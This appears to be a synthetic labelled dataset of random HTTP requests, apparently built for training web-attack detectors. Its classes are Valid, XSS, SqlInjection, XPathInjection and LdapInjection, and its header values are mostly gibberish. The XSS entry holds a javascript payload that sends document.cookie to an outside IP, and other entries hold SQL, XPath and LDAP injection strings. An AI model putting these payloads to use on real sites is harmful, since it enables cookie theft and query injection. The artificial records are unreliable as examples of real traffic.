Accept: image/png;q=0.3, audio/*, application/*;q=0.3
Accept-Charset: euc-jp, windows-1254;q=0.1, iso-10646-ucs-2, euc-tw;q=0.2, euc-jp;q=0.9
Accept-Encoding: 
Accept-Language: eiszawf-thu;q=0.8, Heeh9Inf-epeiiUe;q=0.8, edl-nmc, aoraone-po4c2, plo7b-h;q=0.2
Cache-Control: no-transform
Client-ip: 49.144.79.218
Cookie: orbenegotu=n;toarie3TotaTTht=sisock_streamesstylen'alo(lq+t
Cookie2: $Version="52"
Date: Sun, 27 Mar 05 09:00:57 UTC
ETag: W/"nxRHKEK.BQeNWF48@A5-"
Expect: 100-continue
From: ird3r@eilncwm.cz
If-Modified-Since: Sun, 12 Sep 04 19:31:18 UTC
If-Unmodified-Since: Sun, 17 Sep 06 09:58:29 UTC
If-Match: *
If-None-Match: "T8W6rYM0q65mtV0JG"
If-Range: Sat, 03 Mar 07 19:49:04 UTC
Max-Forwards: 1
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic cnJpMGFlbjptaDlpcw==
Authorization: 5tvplh a2el=1oey3irn
Range: 97-403959,415744-,056-023107
Referer: /tyfeaag/tSiIl/Scdta.mp3
TE: deflate,trailers
Trailer: Connection
User-Agent: Mozilla/8.8 (compatible; Konqueror/9.1; Win98; dlPeeaEy; cssne0; nhrilLy)
UA-CPU: Sparc
UA-Disp: 017,7733,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 568x5684
Via: HTTP/3.9 200.124.217.147, 2.8 10.145.140.74, 3.0 www.ishh.shtml
Transfer-Encoding: rEntz; Sjme5ta=aTcd
Upgrade: yul/1.8, gvic/9.5, hGaw/6.7, Hpe/9.6, dae/2.3
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 0491740909145878411
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22524
Start - Id: 46934
class: XSS
PUT /ssmutenn9tgo/nGmeR6/hZ1pp6/elcOSjcC@EFAJCxmeKr/y8gj-aZfJe/bataGenltemShuNhche/rO7CJBol/ie.php4? HTTP/1.1
Content-Length: 280
Content-Language: avHse,rih,n
Content-Encoding: gzip
Content-Location: http://www.IYvyntVi.org/uixmawu/lrjsT/LdNrt.dll
Content-MD5: VDVzc2V0cmV2b2Rhc2FtYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Mar 10 17:02:26 GMT
Last-Modified: Thu, 04 May 06 15:16:09 CET
Host: 105.192.104.173:80
Connection: close
Accept: text/*, audio/x-wav, video/*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 96.17.77.33
Cookie: rt0p2ne6qsArw=wkjeg;pnmpreTonAa=s|yhpasswde;uwyeaezra=e|7tautoexechd5ft~ soa;hlkst= E->;J1JJNreplaceqVautoexecH=nullwmps
Cookie2: $Version="688"
Date: Mon, 19 Nov 07 21:02:54 UTC
ETag: W/"@EO1@@IWjcaKk@I8WI82"
Expect: Loer=fteWoeui
From: ncieL@oi8koae0fn.net
If-Modified-Since: Fri, 11 Jun 04 16:21:33 UTC
If-Unmodified-Since: Tue, 15 Dec 09 15:30:25 UTC
If-Match: *
If-None-Match: "D8mRwUwzvvgq1MsqtQ"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic Y3BzTW06d3lkc04=
Authorization: Digest qop=v1tssr
Range: 455810-240,-24385
Referer: http://essiata.org/odkPo/nO5va/ooit/9curlie/t5aia3o7.exe
TE: trailers,trailers,deflate;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.3 (X11; U; Solaris 2.7; wl-ea; rv:3.5.4) Gecko/26955498
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 642x9764
Via: FTP/0.8 www.wkhtrh.gif, 8.0 109.228.109.100:42, soe/1.6 www.eStm.gif
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 786 205.251.22.179:965 "eu9tt91t" "Sat, 27 Jan 07 19:48:05 UTC"
X-Forwarded-For: 207.203.23.208
X-Serial-Number: 4682138
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

nruyfw=atUTad&u2=tre&documenthttpw3ersne|m4e4&alntA660elcoh=562&dlep=6&ivtpw8qhdefeXi=cboot.iniai<aNah3e&brnesEdhDUuedi=<img   dynsrc  =" javascript:   [window.open('http://184.206.200.86/trle.cfm'+document.cookie);]    "  >&apviseoiaj=86

End - Id: 46934
Start - Id: 11391
class: Valid
GET /nJccraBAg5X/m8dtskohaNhs/MOdhrcnonp/n1smrS.swf? HTTP/1.0
Host: www.ftaneo.gov
Connection: close
Accept: image/*;q=0.5, text/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: compress, compress, identity, gzip;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 210.70.209.242
Cookie: pUlyrca0eOhy=i]eM;wta8ca9ieOqip=621;e7nrlda=i;lsnullhXQnTFbm4j=06626401;Ctm0s9lie=aperlbetweennaop sst8h@s[ef
Cookie2: $Version="49"
Date: Sun, 08 Feb 09 17:45:37 GMT
ETag: "RZ2m-ikEP5r@5ZO4xnn"
Expect: ehbaset
From: snso@neess.uk
If-Modified-Since: Tue, 21 Feb 06 02:07:34 GMT
If-Unmodified-Since: Thu, 14 Jun 07 01:31:27 UTC
If-Match: "L0nFTa@nF7Vv-0-2y"
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 4.6
Pragma: ncvanUe='ie'
Proxy-Authorization: NTLM dHN0TGN4NmVua2VzZGh4d3luZnJjM01TZnc4Tk51VGV6WmpubGVz
Authorization: NTLM MG9hRXd5ZWx4b1NDa1EwaGlpZWVsbm13T05manNnbmVlbml2ejNraHpseHNybmc=
Range: 53554-,0954-67,-51599
Referer: /eoeslire/gfnn/ihs5fN/aOraeaNa.tar.gz
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 1.4; h6-yi; rv:6.3.2) Gecko/47813875
UA-CPU: Sparc
UA-Disp: 299,1774,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 988x4080
Via: 5.4 74.77.146.239:9, 0.2 www.tehfy.htm
Transfer-Encoding: identity
Upgrade: finaai/3.9, 1acce/6.0, rUd/8.2, qk2ri/2.1, kLt/1.4
Warning: 549 54.14.146.24 "veiinschlftang5nhhmr" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 6208422315681
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11391
Start - Id: 203
class: Valid
GET /hh2m8Ua9xO8fIgZd/30SoPVHqbeW4Ww/rTnGR3jPGE/nleree/efTUv_/hmewxc/tVshutdownBMKDexec/iM/luRtmpL/dpJmC.dll?6y=me8npenp&r7l=12860&nda=linm HTTP/1.1
Host: 82.232.129.185:80
Connection: egid
Accept: text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: ntioeo-ghe;q=0.7, eeeebe-zow9sdij;q=0.6
Cache-Control: no-cache
Client-ip: 217.52.131.115
Cookie: qemnoe7ttoebort=agqEkrdenngyaq;hdln9thn=?io4uprn;KkJCHG8Finsert=thtoe6o tea
Cookie2: $Version="60"
Date: Wed, 11 Feb 04 22:05:49 UTC
ETag: "3N3CXyaIZ5bDjbdk"
Expect: 100-continue
From: wnun9d@Ilphteim0h.ch
If-Modified-Since: Tue, 09 Mar 04 07:30:28 CET
If-Unmodified-Since: Fri, 27 Jan 06 24:07:52 GMT
If-Match: *
If-None-Match: "@DV_KwhrXm.A6dQo"
If-Range: Mon, 13 Aug 07 02:52:18 CET
Max-Forwards: 9638
MIME-Version: 5.6
Pragma: ai='rnEeoq'
Proxy-Authorization: yghn ueizw2es=eeel
Authorization: Digest uri=http://vnhtylrb.st/ifpmaoe/howe.cfm
Range: 534828-
Referer: /8deor1e/tetaEe/ezom/ohdwra0/qRa9s.htm
TE: chunked;q=0.3
Trailer: Accept-Charset
User-Agent: cEbEvy http://www.Edea9Zas.com
UA-CPU: StrongARM
UA-Disp: 021,047,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4314x599
Via: 5.6 www.eiZd.jpeg:9, 0.8 170.183.189.13, 1.7 187.204.101.158
Transfer-Encoding: gzip
Upgrade: Qte9/8.9, fuoe/5.0, efetmY/9.4, etlnke/8.4, nnb3rt/7.1
Warning: 087 www.ltOnotae.shtml:31935 "iiEllyneteg5u" "Thu, 28 May 09 07:54:06 GMT"
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 203
Start - Id: 26507
class: Valid
GET /rO61bfand/e1KtDu7tqeUF3d5./tzclia2rerxdiuun.png? HTTP/1.0
Host: 134.171.253.209
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: cp-936, x-mac-greek;q=0.4, iso-2022-jp, iso-8859-8;q=0.0, iso-8859-2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=361
Client-ip: 196.239.181.136
Cookie: nph-tall28BxmlryiS=irooro6notgeeq;BuAMpTHIr@T= ;euatoworyhea=grR6j6rerei;4eoNey=eDkAY
Cookie2: $Version="9"
Date: Thu, 23 Nov 06 15:15:22 CET
ETag: W/"QDyMq@Goe9dz3cxwdc"
Expect: ofpnit
From: 4e5f4@aengr.net
If-Modified-Since: Wed, 30 Sep 09 16:47:05 GMT
If-Unmodified-Since: Wed, 05 May 10 22:47:46 GMT
If-Match: *
If-None-Match: "RWl5UT3iMNuTcFq"
If-Range: "..6.U9nBnVhyWtEpbeq"
Max-Forwards: 2864
MIME-Version: 2.3
Pragma: yu6=dacstsr
Proxy-Authorization: Digest username="oynAo"
Authorization: Eo0nh rhOmtoo=2hcade
Range: -51243,13953-
Referer: /niuAge/wlXe.cgi
TE: trailers,gzip,trailers
Trailer: Pragma
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 2.9; at-wr; rv:8.0.9) Gecko/16752355
UA-CPU: MIPS
UA-Disp: 9620,0046,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 106x0303
Via: 9.9 www.i4nA.jpg, 2.7 154.234.203.246, tmcnOn/9.7 179.17.203.104
Transfer-Encoding: Fie5au; 6Ghh=dawvn
Upgrade: erCd/6.1
Warning: 109 40.196.142.202 "e8niNthu" "Thu, 07 Jun 07 12:41:01 CET"
X-Forwarded-For: 251.182.204.109
X-Serial-Number: 8696612011
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26507
Start - Id: 41340
class: SqlInjection
GET /osaaithneEhehg/r_HXLrxN5MTNz/G1xKMXS0ZPtA@y/u0natrt2ernO9i/ahu2eado0.png? HTTP/1.1
Host: 23.168.158.201
Connection: at2osnn
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 171.71.195.21
Cookie: rtrHticady='select  customer_phone '||'from     customers   '||'where customer_surname='''||  lv_surname||'''     and    customer_type=1';;rbaeEtaeaaeet=>dsreymO s|9s;dstj1eoehdaou2=taduichea=;pteloyfos=05;nneohohocv=iIAPW;rgrelEqj=hndrdfnkipnqo
Cookie2: $Version="717"
Date: Thu, 06 Nov 08 08:17:35 GMT
ETag: W/"5H.LQ-peGLZ9PLDahfV"
Expect: tsIt=hhr2ifs
From: oprs@hshefehi.biz
If-Modified-Since: Sat, 08 Mar 08 15:54:09 CET
If-Unmodified-Since: Sun, 01 Aug 04 20:00:14 CET
If-Match: "aQodJlhy8flQDURVoMm"
If-None-Match: *
If-Range: "9Lv.ouizKH0pBfu"
Max-Forwards: 16
Pragma: rdIsav='ci'
Proxy-Authorization: imhseH tefiqi=eset
Authorization: NTLM M2RlTjNpdEVmZmV0cnNxdGlqb3N1cnd0b3MyaWRuYWRzaHVlZk5zdGh0SXR3Y0M=
Range: 91736-3
Referer: /qeLahd8.zip
TE: deflate
Trailer: Accept-Encoding
User-Agent: nieetaneexnori
UA-Color: color32
UA-Pixels: 6943x923
Via: 5.4 www.yttuc.html, 9.1 www.noa0or.jpg
Transfer-Encoding: deflate
Upgrade: lrh3x/8.6
Warning: 357 219.139.39.60 "faenat" "Sat, 31 May 08 12:41:00 UTC"
X-Forwarded-For: 168.51.164.252
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41340
Start - Id: 48438
class: XPathInjection
GET /s3mmBITq/q8pfLS4.tH220N/aIbtrbr/nm8izoXuSN3.4WGLWp/OtlWN3/zica.php?cnn=uU2n&ac8uFfe=ifzBMrEZzkdL&nvztlnnis1=%5Dr9n+dvEtlaitl%3A-w&object3MnetcatJGM.AAK=0105149&ycexeedPadsFb7t=oehoh6ic0&Ny1i=st%3Bn0dwhereaNtnlI&do=+-z&d.MmJ=rdgeEkTs8sme7h&ttPnh94Ni=0827&s8iInEfu=etc%2Bexecnk&andUtmpL5nCsf=tTtK HTTP/1.0
Host: www.j55nE20de.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, x-mac-greek, windows-1252
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: c=isol
Client-ip: 160.236.211.26
Cookie: whh3ghrsd3=8TT5AMe;ttjdexGoanoZr=535477;daeottre=ehlenewh;1derNtkwiannie=a3ssn'     or   6    <    count(path/child::*) or   'lr5' ='
Cookie2: $Version="8"
Date: Mon, 29 Dec 08 03:06:53 CET
ETag: W/"c8bvCk0J2jT9AEi"
Expect: 100-continue
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Thu, 17 Mar 05 05:19:24 CET
If-Unmodified-Since: Wed, 23 May 07 15:08:45 CET
If-Match: *
If-None-Match: *
If-Range: "kyciFv6hVGXUaOiy"
Max-Forwards: 81
MIME-Version: 9.5
Pragma: derRee0='is4'
Proxy-Authorization: csh5 e7oha=vom3a6n0
Authorization: Basic OVNlb3JBbjpkU3QzcjA=
Range: 9-73
Referer: http://auendnJ.be/ede0oa.dll
TE: trailers,deflate,trailers
Trailer: Cache-Control
User-Agent: xiLn/9.7.1.3
UA-Disp: 167,4504,32
UA-OS: Win95
UA-Pixels: 8951x179
Via: 8.6 www.thuta2an.css, FTP/0.0 www.rtcfnsje.png
Transfer-Encoding: identity
Warning: 339 102.106.221.116 "ohN8tt0jdobae59W" "Sat, 24 Dec 05 19:23:29 UTC"
X-Forwarded-For: 152.33.64.46
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48438
Start - Id: 34004
class: Valid
POST /0gPan.11/ou8efD1toep6rOyr/ntehhtlriief/c.l2LMlz/c2Eqtoh/obonyograii3don/md3nXlstttD.php? HTTP/1.1
Content-Length: 61
Content-Language: r5aaaps,edi,4
Content-Encoding: gzip
Content-Location: http://www.eimnt.gov/gbjs/AeaE/yWSenss/iteiSs/3Ispakt.conf
Content-MD5: eWh1bzNZZ3RmZWp0MWNudA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Nov 06 24:37:37 CET
Last-Modified: Wed, 01 Feb 06 10:46:47 GMT
Host: www.7p2ht.fr
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: gfntEr-pe
Cache-Control: no-transform
Client-ip: 19.24.147.210
Cookie: emlarnvr4hmh=ik79;ate=1WF0SWTjfZg;raist5t=ebctbepAuggneRent3;yMnhatjzteh=163;c3Mkb=Sihbr2astt;4dtoa=nwrp-
Cookie2: $Version="4"
Date: Fri, 14 Sep 07 02:43:13 CET
ETag: W/"riR5fT5X15ZN4USC2"
Expect: 100-continue
From: yHs9c7e@lsrina.st
If-Modified-Since: Wed, 18 May 05 09:53:22 GMT
If-Unmodified-Since: Tue, 04 Jan 05 01:22:48 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Dec 06 02:18:18 UTC
Max-Forwards: 93
MIME-Version: 1.7
Pragma: 6apmevD='o'
Proxy-Authorization: Digest qop=auth
Authorization: Digest username="Dgeeg"
Range: -4
Referer: http://unErn.net/ksnttrht/wyrs.tiff
TE: trailers,gzip;q=0.6,deflate;q=0.2
Trailer: Referer
User-Agent: kikspdtftEaHQbl
UA-CPU: StrongARM
UA-Disp: 4809,883,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 354x173
Via: uahstm/0.6 168.3.140.123, 8.7 www.5ueOSh.tiff:28, jae4tm/6.1 221.18.233.19
Transfer-Encoding: deflate
Upgrade: oee/5.6, rhoga/6.1, ehtjsr/7.2, qeweO/5.7
Warning: 940 162.211.201.47:6845 "rajautsi" "Thu, 26 Nov 09 04:54:54 UTC"
X-Forwarded-For: 97.120.176.182
X-Serial-Number: 9480871469062795547
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Is3=yala&arvtc=rp0dhe&eymhwa2wh2oa4=te&d7netRymtFiran=havinga

End - Id: 34004
Start - Id: 31870
class: Valid
GET /y7/w2kKeH/aOckWyr/wWk3DIFM_uMTa@h1vrB.png?stssrqpo=cYWRp&rdabsa1=55121&yiezZnose=gebtcsyg&@1NZ=tiTenrsk&liotozsdrepPo=im&sy3itrfrnsct2ru=12259&dl=86468&hOTnd=tsAHa.aE-0O HTTP/1.0
Host: www.Qa5O.gov
Connection: 8nia7T
Accept: text/*;q=0.8, video/*, image/*;q=0.1
Accept-Charset: iso-8859-3;q=0.6, iso-8859-1;q=0.6, utf-7;q=0.1, iso-8859-6;q=0.1, iso-8859-15;q=0.9
Accept-Encoding: 
Accept-Language: t-udseWUxs;q=0.6, hIeeah-en8U;q=0.2, lstsrh-lwatt, mxnlr-clpoofm, eo1-ofs4ky;q=0.4
Cache-Control: min-fresh=652
Client-ip: 181.216.31.135
Cookie: tearLu18r=403547923;TmNidrryo0p=iC3t_9it-
Cookie2: $Version="9"
Date: Sun, 09 Aug 09 15:18:27 UTC
ETag: W/"50bvl8Lx1OUGW-so"
Expect: 100-continue
From: 4grn@di4boa.net
If-Modified-Since: Sat, 22 Sep 07 02:45:29 UTC
If-Unmodified-Since: Tue, 13 Oct 09 18:44:44 CET
If-Match: "L1kfVmAq2RLn_azN8B"
If-None-Match: *
If-Range: Tue, 13 Oct 09 14:51:53 UTC
Max-Forwards: 0386
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bklldG5wYWRoT3NmMTR1ZWt0ZmR1ZWRyTTFqZm9hZ2NyYWZmbA==
Authorization: Digest nc=cEfe8fbe
Range: -86
Referer: http://namseysz.biz/uhrdosS/vh4r/hrea.tiff
TE: trailers,gzip;q=0.6,trailers
Trailer: Accept-Language
User-Agent: aiqaam
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9892x7208
Via: HTTP/4.5 www.3se1Aa.gif, 8.7 www.fhblRfyv.tiff, 1.1 80.157.220.65
Transfer-Encoding: mnieee
Upgrade: aoaot1/1.5, ogrig/7.8, brpos8/2.0, fhdoso/2.1, dtNmmr/0.6
Warning: 167 24.248.253.219 "whbgrnjdetnenb" "Sat, 13 May 06 20:49:02 GMT"
X-Forwarded-For: 83.171.52.58
X-Serial-Number: 69375200108238652611
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31870
Start - Id: 38994
class: LdapInjection
GET /darie1gRhT1eWhga.dll?oz=uiwlP%29%28+%7C++%28OWodf%3D*%29&nediehbec=+usgroup+by%40&S9g8=Bgsn&xL3Dlog2@Me=728&7urvipReTog3ann=lM.wGRAulOO&rENu8nvdert0fn=2esa HTTP/1.0
Host: www.nnsoaoI6ac.com:1
Connection: jstt
Accept: */*;q=0.7
Accept-Charset: x-mac-korean, euc-kr, iso-8859-6;q=0.8, windows-1255, windows-874;q=0.9
Accept-Encoding: 
Cache-Control: no-cache
Date: Sun, 12 Feb 06 19:56:10 CET
ETag: W/"D4kBkEp7RtEZDZU7qq"
If-Modified-Since: Sat, 13 Dec 08 14:37:04 GMT
If-Unmodified-Since: Sun, 25 Oct 09 07:32:15 GMT
If-Match: *
If-None-Match: "-bVKF8-V8ZrO10v"
If-Range: "tHmtjbOs0me@7wUk5Sy3"
Max-Forwards: 2205
MIME-Version: 9.7
Pragma: no-cache
Referer: /oon1i/iheela.tiff
User-Agent: Mozilla/2.4 (X11; U; Solaris 0.7; aS-ph; rv:6.6.2) Gecko/61092997
UA-Disp: 542,569,16
Transfer-Encoding: identity
X-Serial-Number: 2731422703648766

null

End - Id: 38994
Start - Id: 23092
class: Valid
GET /fWTFPbMyunionh1/uim5wldnEEl/wsn1s/L6@VP/jrFetleuRt/kZ@h/mlhh.htm?bodyoBF=2&jr=31578088&ahowretsk0l=eh%3Eo&LhT4velac=898972553&aaounucleNbOmIz=to&sotEeetaaKen=bgsoundhonroptdO%25ub+vbscriptb&sditshcthardpac=059379&bni=y.zd&hcebmss9=375 HTTP/1.1
Host: 6.232.181.199:896
Connection: ewefn
Accept: */*;q=0.6
Accept-Charset: x-mac-japanese, x-mac-ce
Accept-Encoding: compress;q=0.3, deflate;q=0.1
Accept-Language: giinaet-zet, 8o5gde-nvickr;q=0.1, 0tsN2-aate, e2-j, dd-7ltahne
Cache-Control: max-stale
Client-ip: 44.61.195.169
Cookie: Y@xp_rjqqf=t-Towherecu:l;miqFw=ni@
Cookie2: $Version="980"
Date: Tue, 21 Dec 04 06:00:14 UTC
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: eemc3aio=1edSoen;iehc0lqi
From: Hocan@osthutarg1.biz
If-Modified-Since: Mon, 07 Nov 05 05:42:42 GMT
If-Unmodified-Since: Sun, 16 Sep 07 15:40:58 UTC
If-Match: "BYee-fpiem02VmC"
If-None-Match: *
If-Range: Sun, 06 Jan 08 17:29:34 UTC
Max-Forwards: 728
MIME-Version: 5.9
Pragma: oN='tdEhm3'
Proxy-Authorization: Digest nonce
Authorization: NTLM bGRldHNscnNscGFwcmlydzR0OTVnYjlpZm5sYk5hZGFobm5vYnNu
Range: 411788-,-919885,19-6
Referer: /3aegn6/Tcj1Ajt/fme0a/ynhoi/hsae9us.mpeg
TE: gzip;q=0.7,gzip;q=0.3,chunked;q=0.1
Trailer: Authorization
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 5.3; ss-oa; rv:3.0.9) Gecko/03389794
UA-CPU: Sparc
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: HTTP/5.2 59.17.160.8, HTTP/2.2 www.na9oltr.gif:06794
Transfer-Encoding: gzip
Upgrade: prlHv/9.3, doutme/0.7, 0ng/5.1, sapxte/1.0, gee/6.5
Warning: 456 162.216.161.7 "ilbaradldoexnnYuOIAa" "Mon, 05 Jan 04 01:52:11 GMT"
X-Forwarded-For: 14.112.39.35
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23092
Start - Id: 2293
class: Valid
GET /H0QDYn1execn/ahg4om1ptiHe3N/piouesAch7u/haFxconnectFSk/bkn73Eed/etelho/iufut3x2G/i@bLpfQo4/uT5gneSn/ioATKUbpjNx9/metcJEV5Gmeta/rcp2@5swlocationCG7mmochahG.tiff?ti=oeNa&JJQYWuand=deleteneir&FEj9IrMxp.=eetrd&LTK3F5RnQP=9ene9EE9&stOseonnoerrl=execbosystemy%3ClloimgE9Nttdtial&geulsyz79dzs=ttaub&cFoma=a3ymuusM%5DAa&xlea2hwv=7926869425&riuCmap=rnnO&cu=33876&omN4ahg2=eeruInehOne HTTP/1.0
Host: www.5teninrah.uk:014
Connection: RmT0e
Accept: video/*, text/xml;q=0.7
Accept-Charset: windows-1253, iso-8859-1;q=0.6, windows-1257;q=0.6, big5, windows-1250
Accept-Encoding: 
Accept-Language: rttsatc6-ddg;q=0.9, 9m7i-irzre, nhHl-y, oFavysf2-ap2wh;q=0.6
Cache-Control: no-cache
Client-ip: 39.40.75.177
Cookie: kVDconnectTmy1WH=afSth]OxcbetweeneEooe\lkeh;api7aeylle=s33o~9tajQl+[bin&nx4;v3WpniNJWxUr=sFycsAB;nbww=rhttpszhfrdocument;Wjjeztyfkmm7he=61248
Cookie2: $Version="8"
Date: Fri, 21 Jan 05 12:27:45 CET
ETag: W/"lNqUNaPov_L-Lu5n"
Expect: rhatleeo=u061io
From: Epwt@mIbard.com
If-Modified-Since: Mon, 12 Feb 07 19:06:46 CET
If-Unmodified-Since: Thu, 10 Jan 08 24:21:22 CET
If-Match: *
If-None-Match: "GjlT1AZ1EV_CY98"
If-Range: *
Max-Forwards: 709
MIME-Version: 8.1
Pragma: 9Rrnso=tls
Proxy-Authorization: NTLM OHdjc2xva2VhcmVzZXNsMTNhc2FlM2x1Y2FyM2hhZXJjMlBl
Authorization: iuSil tlms=lSmdsiVg
Range: 737-
Referer: http://www.e7wegt.ch/depn.txt
TE: chunked;q=0.3,gzip;q=0.5,trailers
Trailer: User-Agent
User-Agent: tlms3hthoOua
UA-CPU: 68000
UA-Disp: 090,2073,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6264x742
Via: iln/1.2 www.uLedii.html:8, gLv/8.6 39.80.212.7
Transfer-Encoding: compress
Upgrade: tjntna/3.8, spuo/6.9, tzncn/7.1, t2eh0/6.3
Warning: 647 238.244.132.185 "flrteahMclhsa" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2293
Start - Id: 12311
class: Valid
GET /renlCs/cWd_/i_nPZu4kYlA/tnadyedaachit6d/aEol/IKJxeVboXCUA/Ecunionb2kbjpy/yAqDW3/Fujenre0iTbnsicseb/o3jZpJNGPeXT/or.cfm?neakonriy=olITq1K.&amoS@NT=7334730813&ra3yl4ob3ti=c0htdgNn5c0oo&late7eedwcn2=163170887&8Ss0ikaeeealed=iolsHt&v2eviet=rliibin&nnigaheaspe8=1702794&whr4trAs=1120644&A1psn=18 HTTP/1.0
Host: 182.248.21.57
Connection: close
Accept: audio/basic, video/quicktime;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.6, windows-1258, utf-7, windows-874;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 49.9.133.115
Cookie: gsHktTnjeTR=tceyses;etlhgnlbyfoxM=1ahtaccesoza7rm1ae=t:de;dn7woymt=%2ru ]Ao0all
Cookie2: $Version="6"
Date: Mon, 20 Feb 06 23:43:13 UTC
ETag: "yXiY22b@llRr0lLdmn"
Expect: 100-continue
From: iman0m@blrqt7ti.gov
If-Modified-Since: Tue, 12 Jun 07 21:36:25 GMT
If-Unmodified-Since: Sun, 30 May 04 04:20:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 815
MIME-Version: 3.6
Pragma: tt=IhRoae
Proxy-Authorization: Basic ZWZoSHAyYzpkbjh5ZTh5eA==
Authorization: Digest nonce
Range: 53-93,362543-
Referer: /sranh/lsrO1Ttg.php4
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 4.9; ad-3n; rv:0.8.4) Gecko/01193937
UA-CPU: 68000
UA-Disp: 1104,1931,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4392x5610
Via: 5.8 199.127.195.100:19, e1eGsw/2.4 www.otrdeOye.htm, ub9/9.3 www.Ruoduwta.jpeg
Transfer-Encoding: gzip
Upgrade: god/4.2, see0e0/3.6
Warning: 665 24.150.246.12 "aeenoduraB" 
X-Forwarded-For: 55.96.214.140
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12311
Start - Id: 20452
class: Valid
GET /phlsW0HwMflaeirhn/tnasoswkrairnahee3se/e2/aoicEinfvws9iahuexh/nkulipatoeoe/aIhyee05mii/oOAD8KKR/RtthtRdeSislntoo.aspx? HTTP/1.0
Host: 117.144.153.35
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=2
Client-ip: 83.158.227.172
Cookie: so=790744916;octkaOh9k=frE;l9=l;ssmwnhWteSeft=setniiaoo9tLreg
Cookie2: $Version="3"
Date: Wed, 19 Aug 09 04:10:03 UTC
ETag: "unavVCJD-pboO@Cu"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Wed, 23 Jun 04 03:07:36 GMT
If-Unmodified-Since: Fri, 04 Feb 05 06:09:41 CET
If-Match: "Ape1uD.VNpIvv@jVSt.N"
If-None-Match: "lJHxTm2iO0WT@ne-5m"
If-Range: *
Max-Forwards: 61
MIME-Version: 0.1
Pragma: Hsete='te'
Proxy-Authorization: Basic aWJQamVScjpybmVncw==
Authorization: NTLM NGlsZ2hya25haWV6M05jdWVvbmxlZXRpZEkyYWpsNXI5eXR0YQ==
Range: -896,61-724379,-171
Referer: http://sgecen.biz/fefze/s9tmnsnl/up1eR.tar
TE: trailers,trailers,deflate;q=0.3
Trailer: Authorization
User-Agent: Mozilla/4.1 (Windows; U; Win98 1.2; uE-2d; rv:4.0.1) Gecko/53295686
UA-CPU: 68000
UA-Disp: 635,2020,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2799x9300
